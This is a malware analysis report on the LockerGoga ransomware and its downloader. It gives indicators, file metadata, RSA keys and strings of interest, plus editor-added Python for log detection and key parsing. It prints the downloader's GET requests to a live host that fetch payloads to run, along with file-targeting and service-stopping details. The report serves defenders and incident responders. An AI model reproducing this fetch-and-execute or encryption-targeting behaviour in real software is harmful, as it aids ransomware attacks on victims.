Malware Analysis Report (AR20-133F)

MAR-10238137-1.v2


Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description


The Cybersecurity and Infrastructure Security Agency (CISA) acquired a downloader and multiple samples of the ransomware family known as LockerGoga for analysis. This report provides detailed analysis of three variants of the LockerGoga ransomware. The first variant, with a compile date of January 2019, attempts to encrypt targeted files on the compromised system. The second variant, with a compile date of early March 2019, encrypts targeted files and attempts to shut down Windows System services. The third variant, with a compile date of mid-March 2019, encrypts targeted files, attempts to shut down Windows System services, and attempts to enumerate account names on the compromised system and change the passwords of those accounts.

To encrypt the targeted files, all LockerGoga variants generate 32 bytes of pseudo-random data, which are used as the Advanced Encryption Standard (AES) key and initialization vector (IV). A hard-coded public Rivest, Shamir, and Adleman (RSA) key is used to encrypt these 32 bytes of AES key data, and the RSA-encrypted key data is appended to the end of each encrypted file. A different AES key/IV is generated for each of the files the ransomware encrypts. In addition, all LockerGoga variants use a multiprocessing framework, built on the Boost C++ libraries, to encrypt the targeted files; during encryption, dozens or hundreds of separate LockerGoga processes are spawned. The ransomware places a file named "README_LOCKED.txt" on the desktop of the compromised system, which provides instructions on how to decrypt the files.

The first variant includes the following samples:
5b0b972713cd8611b04e4673676cdff70345ac7301b2c23173cdfeaff564225c
8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29
f3c58f6de17d2ef3e894c09bc68c0afcce23254916c182e44056db3cad710192
bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f
c3d334cb7f6007c9ebee1a68c4f3f72eac9b3c102461d39f2a0a4b32a053843a
6e69548b1ae61d951452b65db15716a5ee2f9373be05011e897c61118c239a77

The second variant includes the following samples:
eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0
ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f
7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26

The third variant includes the following samples:
c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15
88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f

For a downloadable copy of IOCs, see MAR-10238137-1.v2.stix.

Emails (12)

AbbsChevis[@]protonmail.com

AsuxidOruraep1999[@]o2.pl

CottleAkela[@]protonmail.com

DharmaParrack[@]protonmail.com

IjuqodiSunovib98[@]o2.pl

MayarChenot[@]protonmail.com

QicifomuEjijika[@]o2.pl

QyavauZehyco1994[@]o2.pl

RezawyreEdipi1998[@]o2.pl

SayanWalsworth96[@]protonmail.com

SuzuMcpherson[@]protonmail.com

wyattpettigrew8922555[@]mail.com

Submitted Files (14)

0a960dd9c015545c2fe4d4f39bae6f9e7af1afb1933900f105c5ae9ec51a446d (0a960dd9c015545c2fe4d4f39bae6f...)

5b0b972713cd8611b04e4673676cdff70345ac7301b2c23173cdfeaff564225c (5b0b972713cd8611b04e4673676cdf...)

6e69548b1ae61d951452b65db15716a5ee2f9373be05011e897c61118c239a77 (6e69548b1ae61d951452b65db15716...)

7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26 (7bcd69b3085126f7e97406889f78ab...)

88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f (88d149f3e47dc337695d76da52b256...)

8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29 (8cfbd38855d2d6033847142fdfa747...)

ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f (ba15c27f26265f4b063b65654e9d7c...)

bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f (bdf36127817413f625d2625d313376...)

bef41d3c76aa98e774ca0185eb5d37da7bf128e3d855ebc699fed90f3988c7d3 (bef41d3c76aa98e774ca0185eb5d37...)

c3d334cb7f6007c9ebee1a68c4f3f72eac9b3c102461d39f2a0a4b32a053843a (c3d334cb7f6007c9ebee1a68c4f3f7...)

c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15 (c97d9bbc80b573bdeeda3812f4d00e...)

ec52b27743056ef6182bc58d639f477f9aab645722f8707300231fd13a4aa51f (ec52b27743056ef6182bc58d639f47...)

eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0 (eda26a1cd80aac1c42cdbba9af813d...)

f3c58f6de17d2ef3e894c09bc68c0afcce23254916c182e44056db3cad710192 (f3c58f6de17d2ef3e894c09bc68c0a...)

Domains (1)

inhyunits.co.kr

IPs (1)

211.115.206.121

Findings

0a960dd9c015545c2fe4d4f39bae6f9e7af1afb1933900f105c5ae9ec51a446d

Tags

CVE-2017-8759, downloader, ransomware, trojan

Details
Name 0a960dd9c015545c2fe4d4f39bae6f9e7af1afb1933900f105c5ae9ec51a446d
Size 389632 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d2f637c8054b7d31ae0230b0e18016f6
SHA1 56ca6afc91cca17e2c2423f0d196979bf2f70b1f
SHA256 0a960dd9c015545c2fe4d4f39bae6f9e7af1afb1933900f105c5ae9ec51a446d
SHA512 db006723279f8d4e43f3798d5ad83301d76f7deef5ff3bcee9363fd3dbb191efbe356035ec5f91f68b31939ac2ac393ec8496406cbe219e0a0f74ec7cdb992ed
ssdeep 1536:x4Pud954WSDZ5sjHkTTmcJzRa+WNJ6EFk9vjtBF6JzRa+WNJ6EFk9vjtBFL:x4Pe95v2BTmc3I6SwZBg3I6SwZBZ
Entropy 4.797588
Antivirus
Ahnlab Trojan/Win32.Hwdoor
Antiy Trojan/Win32.Agentb
Avira EXP/W97M.CVE-2017-8759.xxwrs
BitDefender Trojan.GenericKD.41129073
ClamAV Win.Ransomware.LockerGoga-7008188-0
ESET Win32/TrojanDownloader.Agent.EMK trojan
Emsisoft Trojan.GenericKD.41129073 (B)
Ikarus Exploit.2
K7 Trojan ( 003e58dd1 )
McAfee RDN/Generic.ego
NANOAV Trojan.Win32.Dwn.folwni
Symantec Downloader
TACHYON Trojan-Downloader/W32.Agent.389632.U
TrendMicro TROJ_DN.E18E869D
TrendMicro House Call TROJ_DN.E18E869D
VirusBlokAda BScope.Trojan.Agentb
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-03-17 05:33:02-04:00
Import Hash 70b3ccd6172dcfd0ebf7eac46b4a26ae
PE Sections
MD5 Name Raw Size Entropy
edc2f175286b6382705f008d19d6c36e header 1024 2.444022
9fa13e1ad07729207352b58a2015ddd3 .text 26112 6.382131
1ef60b36e19f1aa5d02f1f08d54fe1fd .rdata 11264 4.904405
40a16a84fd0b58c2b8b458f8f3b56d9e .data 3072 2.671540
adbf74eb294a67f6f2261c11f1c5d6f2 .rsrc 343040 4.535774
3472951a5e9449d21a6b4f33b31fcc95 .reloc 5120 3.254207
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
0a960dd9c0... Connected_To inhyunits.co.kr
Description

This application is a malicious PE32 executable designed to download and execute payloads on the victim's system. When executed, it creates a mutex named "f396t9sjh9439y" and XOR-decodes the following strings:

--Begin strings--
/bbs/adm/img/camp/vcasi.php
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
"\Start Menu\Programs\Startup\"
inhyunits.co.kr/bbs/icon/ritian.php?yishi=1
inhyunits.co.kr/bbs/icon/yiqi.tar
--End strings--

It contains the below hexadecimal encoded file name strings:

--Begin file name strings--
iCloud.exe
sample.jpg
--End file name strings--

During runtime, it attempts to download and install a payload from a web site in Korea using the below URI:

--Begin URI--
inhyunits.co.kr/bbs/icon/ritian.php?yishi=1
--End URI--

Displayed below is the GET request:

--Begin GET request--
GET /bbs/icon/ritian.php?yishi=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: inhyunits.co.kr
Cache-Control: no-cache
--End GET request--

The payload was not available for analysis. Analysis indicates that the response payload is validated (the first two bytes must be "0x18 0xDA") and then XOR-decoded. The decoded payload is installed and executed from "%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iCloud.exe".

It also attempts to download and install another payload using the below GET request:

--Begin GET request--
GET /bbs/icon/yiqi.tar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: inhyunits.co.kr
Cache-Control: no-cache
--End GET request--

The payload was not available for analysis. Analysis indicates that the response payload is installed and executed from "%AppData%\Local\Temp\sample.jpg".
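
The two GET requests above are the downloader's network footprint and give a proxy-side detection opportunity. As an added example (supplied by the editor, not code from the report), the following Python scans proxy-style log lines for the downloader's host, IP and URI paths, treating the User-Agent only as a confidence booster because it is the stock IE11-on-Windows-7 string seen in plenty of benign traffic. It also includes the response check the report describes: the "0x18 0xDA" marker the downloader expects at the start of the first payload before XOR-decoding it. The log lines and their column layout are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Network indicators from the report's analysis of the downloader.
DOWNLOADER_HOST = "inhyunits.co.kr"
DOWNLOADER_IP = "211.115.206.121"
DOWNLOADER_PATHS = {
    "/bbs/icon/ritian.php",         # first payload, dropped as Startup\iCloud.exe
    "/bbs/icon/yiqi.tar",           # second payload, dropped as Temp\sample.jpg
    "/bbs/adm/img/camp/vcasi.php",  # additional XOR-decoded path in the sample
}
# User-Agent sent with both requests: the stock IE11 / Windows 7 string, so it
# only adds confidence to a host or path match and never fires on its own.
DOWNLOADER_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
# The downloader accepts the first payload only if the body starts with these bytes.
PAYLOAD_MAGIC = b"\x18\xda"

# Constructed proxy log lines (not from the report), one request per line:
# <timestamp> <client-ip> <method> <url> <status> "<user-agent>"
SAMPLE_LOG = """\
2019-03-20T10:01:02Z 10.0.0.15 GET http://inhyunits.co.kr/bbs/icon/ritian.php?yishi=1 200 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2019-03-20T10:01:03Z 10.0.0.15 GET http://inhyunits.co.kr/bbs/icon/yiqi.tar 200 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2019-03-20T10:02:00Z 10.0.0.22 GET http://example.org/index.html 200 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2019-03-20T10:03:00Z 10.0.0.31 GET http://211.115.206.121/bbs/adm/img/camp/vcasi.php 404 "curl/7.64.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def classify_request(url, user_agent):
    """Return the names of the indicators a request matches (empty list if none)."""
    parts = urlsplit(url)
    reasons = []
    if parts.hostname in (DOWNLOADER_HOST, DOWNLOADER_IP):
        reasons.append("host")
    if parts.path in DOWNLOADER_PATHS:
        reasons.append("path")
    # The UA is far too common to count alone; it only strengthens an existing match.
    if reasons and user_agent == DOWNLOADER_UA:
        reasons.append("user-agent")
    return reasons


def scan_log(text):
    """Return one hit per log line that matches at least one downloader indicator."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # line does not fit the constructed format
        ts, client, _method, url, _status, ua = m.groups()
        reasons = classify_request(url, ua)
        if reasons:
            hits.append({"time": ts, "client": client, "url": url, "reasons": reasons})
    return hits


def looks_like_first_payload(body):
    """True when a response body carries the 2-byte marker the downloader checks
    before XOR-decoding; useful for flagging the payload in captured responses."""
    return body[:2] == PAYLOAD_MAGIC


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["url"], ",".join(hit["reasons"]))
```

Against the constructed log the scan flags the two requests from 10.0.0.15 with all three reasons and the request to the bare IP with host and path only; the unrelated request that merely shares the User-Agent is not reported.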

88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f

Tags

ransomware, trojan

Details
Name 88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f
Size 1268600 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c2da604a2a469b1075e20c5a52ad3317
SHA1 442ed0cac2abe062d8e630f3ece803af687751db
SHA256 88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f
SHA512 966aec9c149646cf22675e82459a88ac0ae8b187714e05d1c1401149e69e1c1b71f06ac878982a19d1feda667772915c0ff15dab92e326752b001e20f240560b
ssdeep 24576:645Rt4El7fc/TFJzjJUgrrCq5sNIwQsUGy1q49DlIACTp+kqGslRG:Rjt4El7fc/TFJWstwQsPdsDuACTpqhG
Entropy 6.409640
Antivirus
AegisLab Trojan.Win32.Crypren.tpXh
Ahnlab Win-Trojan/Alisa.Exp
Antiy Trojan[Ransom]/Win32.Crypren
Avira TR/AD.LockerGaga.wxqlr
BitDefender Trojan.GenericKD.31807201
ClamAV Win.Ransomware.Lockergoga-6918486-0
Cyren W32/LockerGoga.C.gen!Eldorado
ESET a variant of Win32/Filecoder.LockerGoga.D trojan
Emsisoft MalCert.A (A)
Ikarus Trojan-Ransom.LockerGoga
K7 Trojan ( 00549a691 )
McAfee Ransom-Goga!C2DA604A2A46
Microsoft Security Essentials Ransom:Win32/LockerGoga
NANOAV Trojan.Win32.Crypren.fofbon
Quick Heal TrojanRansom.Crypren
Sophos Troj/Ransom-FHW
Symantec Ransom.GoGalocker
TACHYON Ransom/W32.LockerGoga.1268600
TrendMicro Ransom.6989548C
TrendMicro House Call Ransom.6989548C
Vir.IT eXplorer Trojan.Win32.Encoder.BJD
VirusBlokAda TrojanRansom.Crypren
YARA Rules

No matches found.

ssdeep Matches
99 c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15
PE Metadata
Compile Date 2019-03-18 05:07:54-04:00
Import Hash ce51c671c94cce6379a0f6823fad4112
Company Name ALISA LTD
File Description Background Tasks Host
Internal Name tgytutrc
Legal Copyright Copyright (C) ALISA LTD 2019
Original Filename tgytutrc
Product Name Service tgytutrc
Product Version 1.5.1.0
PE Sections
MD5 Name Raw Size Entropy
fef81ff280f7970a0e8c5fb7cf72ccc8 header 1024 3.137939
d2cece39d6a77b83a83f293a258e0539 .text 950784 6.394510
e9cf132ec4ae53fd577acd75d0f2f2fd .rdata 215040 5.005741
7875cbf4a0d2bf8dcfc3e8050d9155d7 .data 36864 4.906004
989c5454046d063763761caf32d530cc .rsrc 1536 3.713257
baeab56fc43111e778df3bb41ed018c4 .reloc 58368 6.554867
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
88d149f3e4... Related_To DharmaParrack[@]protonmail.com
88d149f3e4... Related_To wyattpettigrew8922555[@]mail.com
Description

This file is a Windows 32-bit executable identified as the third variant of LockerGoga. It encrypts the targeted files, attempts to shut down Windows System services, and attempts to change the user account passwords on the compromised system.

Screenshots
Screen_Shot_2019-03-31_at_9.27.04_AM.png -

Screen_Shot_2019-03-31_at_9.30.50_AM.png -

Screen_Shot_2019-03-31_at_9.35.48_AM.png -

8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29

Tags

ransomware, trojan

Details
Name 8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29
Size 1282576 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 164f72dfb729ca1e15f99d456b7cf811
SHA1 f92339e73c7e901c0c852d8e65615cfb588a4ff6
SHA256 8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29
SHA512 9fb1314230df3ffec2dc2add2dd2450eddffcb981b0742875b876162318c55921bcd737b18b2bf6157f2a30a7fe69d271ded0db517cfb233e9d37e37b3a66b7f
ssdeep 24576:Kla7NCRgrdZ3+0qC3iQx+iE89W++aHGX4vju0zU7KwQCBzSyn9RwAoS:KYxSU393kiE8KRXGuV7KwQCBzSQwAoS
Entropy 6.590504
Antivirus
AegisLab Trojan.Win32.Crypren.tpVm
Ahnlab Trojan/Win32.FileCoder
Antiy Trojan[Ransom]/Win32.Crypren
Avira TR/AD.LockerGaga.ujeuv
BitDefender Trojan.GenericKD.31581882
ClamAV Win.Ransomware.Lockergoga-6900587-0
Cyren W32/LockerGoga.A.gen!Eldorado
ESET Win32/Filecoder.LockerGoga.A trojan
Emsisoft Trojan.GenericKD.31581882 (B)
Ikarus Trojan-Ransom.LockerGoga
K7 Trojan ( 005470f61 )
McAfee Trojan-Ransom.b
Microsoft Security Essentials Ransom:Win32/LockerGoga
NANOAV Trojan.Win32.Encoder.fmmfaf
NetGate Trojan.Win32.Malware
Quick Heal Ransom.LockerGoga.S5239812
Sophos Troj/Ransom-FFO
Symantec Ransom.GoGalocker
TrendMicro Ransom.8F9672D2
TrendMicro House Call Ransom.8F9672D2
Vir.IT eXplorer Trojan.Win32.Encoder.BNYU
VirusBlokAda Trojan.Encoder
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-01-16 14:27:26-05:00
Import Hash 9f0af3709985725a166977d6f89a4b0e
Company Name Mlcrosoft
File Description Host Process for Windows Services
Internal Name worker32
Legal Copyright Copyright (C) 2019
Original Filename worker32
Product Name Service Worker
Product Version 1.0.2.0
PE Sections
MD5 Name Raw Size Entropy
79dfac702f6564322eb8eddff1e5a4b4 header 1024 2.906923
897ab3c9781dbb3aac161c845868f55a .text 942592 6.616388
39b6d47d0b7f223fa760dadc76bbf3da .rdata 228864 4.918639
c9f5cd50e9dd7e08029d8c8a855728ef .data 42496 4.943752
99e49d99f4d82e78d24c456d8c37acb7 .rsrc 1536 3.646307
005b349ad468258ccdc68b74335df934 .reloc 62464 6.566553
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
8cfbd38855... Related_To AbbsChevis[@]protonmail.com
8cfbd38855... Related_To IjuqodiSunovib98[@]o2.pl
Description

This file is a Windows 32-bit executable identified as the first variant of LockerGoga. It encrypts targeted files.

eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0

Tags

trojan

Details
Name eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0
Size 1254264 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 16bcc3b7f32c41e7c7222bf37fe39fe6
SHA1 a25bc5442c86bdeb0dec6583f0e80e241745fb73
SHA256 eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0
SHA512 f3e7087f569b3bcc201c006c5dfcea6cf560cad480bc03e6f17790190bc35bf6659e91a9f91219952bd139a3c9afde961032ee1d0861158409206feaa6540f9e
ssdeep 24576:uj/6CtkHRos9l+zan4Q6eQqF5ZgQibE2zkMiJHic9OuTw258tox6T9G0SKoRl:A/NtkHRos9l+zan4QTB/2zkPtBq2itoP
Entropy 6.637733
Antivirus
Ahnlab Win-Trojan/Alisa.Exp
Antiy Trojan[Ransom]/Win32.Agent
Avira TR/AD.LockerGaga.kevou
BitDefender Trojan.Agent.DRBC
Cyren W32/LockerGoga.C.gen!Eldorado
ESET a variant of Win32/Filecoder.LockerGoga.C trojan
Emsisoft MalCert.A (A)
Filseclab Trojan.DOMG.lvlk
Ikarus Trojan-Ransom.LockerGoga
K7 Riskware ( 0040eff71 )
McAfee Ransom-Goga!16BCC3B7F32C
Microsoft Security Essentials Ransom:Win32/LockerGoga
NANOAV Trojan.Win32.Encoder.fnvvpk
NetGate Trojan.Win32.Malware
Quick Heal Trojan.Multi
Sophos Troj/Ransom-FHW
Symantec Ransom.GoGalocker
TACHYON Ransom/W32.LockerGoga.1254264
TrendMicro Ransom.8F9672D2
TrendMicro House Call Ransom.8F9672D2
Vir.IT eXplorer Trojan.Win32.Encoder.BIP
VirusBlokAda TrojanRansom.Agent
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-03-02 14:41:12-05:00
Import Hash 5ac063140bb65ee6bf5852bb45b1e9b6
Company Name ALISA LTD
File Description Background Tasks Host
Internal Name yxugwjud
Legal Copyright Copyright (C) ALISA LTD 2019
Original Filename yxugwjud
Product Name Service yxugwjud
Product Version 1.3.2.0
PE Sections
MD5 Name Raw Size Entropy
8116d3096e3e367224cffef102f3e74b header 1024 3.078292
c02f7c6bf4d062bd558381654551164d .text 935936 6.661819
4178579bb7208b5a8df95933f622fb9a .rdata 215040 5.005001
83122215ddac73fe4bf67170fff8de8b .data 37376 4.985918
bfef6df0df70950ab096fd2fa132da52 .rsrc 1536 3.736642
9e0d1711fa1b3b00ca61328f1e35f210 .reloc 58368 6.553686
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
eda26a1cd8... Related_To SuzuMcpherson[@]protonmail.com
eda26a1cd8... Related_To AsuxidOruraep1999[@]o2.pl
Description

This file was identified as the second variant of LockerGoga, which encrypts the targeted files and attempts to shut down Windows System services. The hard-coded RSA keys differ between the second variant samples. Displayed below are the RSA keys for the second variant samples:

--Begin Second Variant SHA256 Hashes and RSA Keys--

-------------------------------------------------------------------------------------------
eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0

MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQD4ZArmcis7vWav4PzdrEvWW2aWI++jYuDz BLI1OZv0SrEO3KoaPMj1cXV6a+GHdnjdiPUprU0dodJW7CagV/89WI72RZdVRYPVXNKoKtUz FM16KiguwKZ6ZY/ZdQCgLtwrZ/2r2KJmazrkctlQsz6WCcCETOM1ohdrvzzWjOzhYwIBEQ==

-------------------------------------------------------------------------------------------
ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f

MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQDCba/W2jLTbVRJEtaasoTTmlt1ZnmX/2OT 6//hgvqePHKsO/z4fP2+wAffmAjQHGK2dAZ+HN7cxlbDXywi+s/k5XWgo3Fg0gAjfJBhMe5T x+LIfDEcs+R+TUfUYZX8SBh/0ksF7DnGPtojoq9NrV/cNR7ZcIlcM/ITOfHEZWSDDwIBEQ==

-------------------------------------------------------------------------------------------
7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26

MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQC9dR7jfOdn8AZTi0plXQRQKHWJAxLlykYr 9V4ZMXLJ9d9kmyHUoKturoTYNZZisiW5ncP6/2YtG5ezGSXnQXUQtZTAnVesTalNvLyd6tBe t81p8mxflulX99T2WKubEnc2OR0Yj2a6EJppt2IVx6H/BiF7G3Z2z4qg/tsXBant4wIBEQ==

--End Second Variant SHA256 Hashes and RSA Keys--
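
The three keys above are base64-encoded DER SubjectPublicKeyInfo blobs. As an added example (supplied by the editor, not code from the report), the following Python walks that DER with a minimal tag-length-value reader and reports, for each second-variant sample, the modulus size, the public exponent and a SHA-256 fingerprint of the key. The modulus length matters to a responder because, as the Summary explains, the 32-byte AES key/IV of each encrypted file is RSA-encrypted with this key and appended to the file, so the appended block is one RSA ciphertext of modulus length; the fingerprint lets encrypted files or samples be tied to a specific key. The OAEP payload calculation assumes RSA-OAEP with SHA-1, inferred from the "OAEP-", "SHA-1" and "MGF1" strings in the strings of interest below; that padding choice is an inference, not something the report states.

```python
import base64
import hashlib

# Hard-coded RSA public keys (base64 DER SubjectPublicKeyInfo) of the three
# second-variant samples, as listed in the report. The embedded spaces are the
# report's line wrapping and are stripped before decoding.
SECOND_VARIANT_KEYS = {
    "eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0":
        "MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQD4ZArmcis7vWav4PzdrEvWW2aWI++jYuDz "
        "BLI1OZv0SrEO3KoaPMj1cXV6a+GHdnjdiPUprU0dodJW7CagV/89WI72RZdVRYPVXNKoKtUz "
        "FM16KiguwKZ6ZY/ZdQCgLtwrZ/2r2KJmazrkctlQsz6WCcCETOM1ohdrvzzWjOzhYwIBEQ==",
    "ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f":
        "MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQDCba/W2jLTbVRJEtaasoTTmlt1ZnmX/2OT "
        "6//hgvqePHKsO/z4fP2+wAffmAjQHGK2dAZ+HN7cxlbDXywi+s/k5XWgo3Fg0gAjfJBhMe5T "
        "x+LIfDEcs+R+TUfUYZX8SBh/0ksF7DnGPtojoq9NrV/cNR7ZcIlcM/ITOfHEZWSDDwIBEQ==",
    "7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26":
        "MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQC9dR7jfOdn8AZTi0plXQRQKHWJAxLlykYr "
        "9V4ZMXLJ9d9kmyHUoKturoTYNZZisiW5ncP6/2YtG5ezGSXnQXUQtZTAnVesTalNvLyd6tBe "
        "t81p8mxflulX99T2WKubEnc2OR0Yj2a6EJppt2IVx6H/BiF7G3Z2z4qg/tsXBant4wIBEQ==",
}

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1


def _read_tlv(buf, pos):
    """Read one DER tag-length-value at buf[pos]; returns (tag, value, next_pos).
    Handles short-form lengths and the long-form (0x81/0x82) lengths used here."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(b64_key):
    """Parse a base64 SubjectPublicKeyInfo carrying an rsaEncryption key.
    Returns modulus bit/byte length, public exponent and a SHA-256 fingerprint of the DER."""
    der = base64.b64decode("".join(b64_key.split()))
    tag, spki, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    tag, alg, pos = _read_tlv(spki, 0)       # AlgorithmIdentifier
    _, oid, _ = _read_tlv(alg, 0)
    if tag != 0x30 or oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bitstr, _ = _read_tlv(spki, pos)    # BIT STRING wrapping RSAPublicKey
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("unexpected BIT STRING")
    _, rsapub, _ = _read_tlv(bitstr, 1)      # skip the unused-bits byte
    _, n_bytes, pos = _read_tlv(rsapub, 0)   # INTEGER modulus
    _, e_bytes, _ = _read_tlv(rsapub, pos)   # INTEGER public exponent
    n = int.from_bytes(n_bytes, "big")
    e = int.from_bytes(e_bytes, "big")
    return {
        "modulus_bits": n.bit_length(),
        "modulus_bytes": (n.bit_length() + 7) // 8,
        "exponent": e,
        "fingerprint": hashlib.sha256(der).hexdigest(),
    }


def max_oaep_payload(modulus_bytes, hash_len=20):
    """Largest plaintext one RSA-OAEP block can carry (RFC 8017: k - 2*hLen - 2).
    hash_len=20 assumes SHA-1, inferred from the sample's strings, not stated by the report."""
    return modulus_bytes - 2 * hash_len - 2


def summarize_keys(keys=SECOND_VARIANT_KEYS):
    """Per-sample key facts plus the size of the RSA block appended to each encrypted file."""
    summary = {}
    for sha256, b64 in keys.items():
        info = parse_rsa_spki(b64)
        # One RSA ciphertext is modulus-length, so that is the trailer size to expect.
        info["appended_block_bytes"] = info["modulus_bytes"]
        info["aes_key_iv_fits_one_block"] = 32 <= max_oaep_payload(info["modulus_bytes"])
        summary[sha256] = info
    return summary


if __name__ == "__main__":
    for sha256, info in summarize_keys().items():
        print(sha256[:12], info["modulus_bits"], info["exponent"], info["fingerprint"][:16])
```

All three keys decode to 1024-bit moduli with public exponent 17 and distinct fingerprints, and the 32-byte AES key/IV fits comfortably within the 86-byte OAEP capacity of a 128-byte block, which is consistent with a single RSA block being appended per file.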

Before encrypting files, the malware imports the Windows library "Rstrtmgr.dll" and uses functions exported by this Windows dynamic link library (DLL) to find applications and services registered with the Windows Restart Manager on the compromised system. The malware will attempt to disable important system services and possibly target services responsible for running anti-virus and security software. This gives the malware a higher probability of encrypting as many files as possible before it is identified and stopped by network security software.

Strings of interest from this variant of LockerGoga are displayed below:

--Begin Strings of Interest--

lgorithmParametersBase: parameter "
InputBuffer
Log2Base
DecodingLookupArray
InsertLineBreaks
MaxLineLength
Global\SM-yxugwjud
\([xX]86\)
.lnk
\.(do[ct][xb]?|wbk|xlm|xlsx|xltx|xlsb|xlw|pp[ts]|pot|p[op][st]x|sldx|pdf|db|sql)
Rstrtmgr.dll
RmStartSession
RmRegisterResources
RmGetList
started
timeout
unknown exception $
unknown exception
exiting
finished
scan finised
c:/.log
warming up...
/w:
cipher.exe
done.
.cmd
del
timeout 3
del
master:
unknown exception
.exe
yxugwjud
move
cmd.exe
SeDebugPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeLockMemoryPrivilege
SeCreateGlobalPrivilege
options
log
log,l
master
master,m
slave
slave,s
ipc
ipc,i
invalid map<K, T> key
OutputStringPointer
StringSink: OutputStringPointer not specified
Unflushable<T>: this object has buffered input that cannot be flushed
vector<T> too long
BufferedTransformation: this object doesn't allow input
AllocatorBase: requested size would cause integer overflow
get_next_capacity, allocator's max size reached
vector<bool> too long
invalid string position
NtSetInformationFile
NtQuerySystemInformation
NtQueryObject
NtQuerySemaphore
NtQuerySection
NtOpenFile
NtClose
NtQueryTimerResolution
